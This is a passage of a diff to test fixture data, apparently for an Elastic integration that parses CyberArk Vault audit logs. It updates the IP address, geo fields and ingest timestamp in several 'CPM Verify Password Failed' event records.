Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:25:32\",\"IsoTimestamp\":\"2021-03-15T13:25:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \\n\",\"ExtraDetails\":\"address=67.43.156.15;username=bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814709\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"UserDN\",\"Value\":\"ELASTIC.local\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", @@ -250,22 +228,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "ELASTIC.local\\bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -288,7 +255,7 @@ }, "@timestamp": "2021-03-15T13:33:26.000Z", "file": { - "path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart" }, "ecs": { "version": "1.12.0" @@ -300,27 +267,27 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n", "iso_timestamp": "2021-03-15T13:33:26Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:33:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:33:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615815206\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:33:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:33:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615815206\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC.local\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -329,11 +296,11 @@ "retries_count": "0", "reset_immediately": "VerifyTask", "last_task": "VerifyTask", - "cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cpm_error_details": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", "last_fail_date": "1615815206", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password Failed", @@ -346,9 +313,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-06-09T10:24:34.493904800Z", - "original": "\u003c7\u003e1 2021-03-15T13:33:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:33:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:33:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615815206\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:33:26\",\"IsoTimestamp\":\"2021-03-15T13:33:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=34.66.114.180;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615815206\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", + "ingested": "2021-12-09T13:37:01.193608300Z", + "original": "\u003c7\u003e1 2021-03-15T13:33:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:33:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:33:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615815206\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:33:26\",\"IsoTimestamp\":\"2021-03-15T13:33:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=67.43.156.15;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615815206\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", @@ -371,22 +338,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "ELASTIC.local\\bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -409,7 +365,7 @@ }, "@timestamp": "2021-03-15T15:04:11.000Z", "file": { - "path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart" }, "ecs": { "version": "1.12.0" @@ -421,28 +377,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n", "iso_timestamp": "2021-03-15T15:04:11Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 08:04:11\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T15:04:11Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" 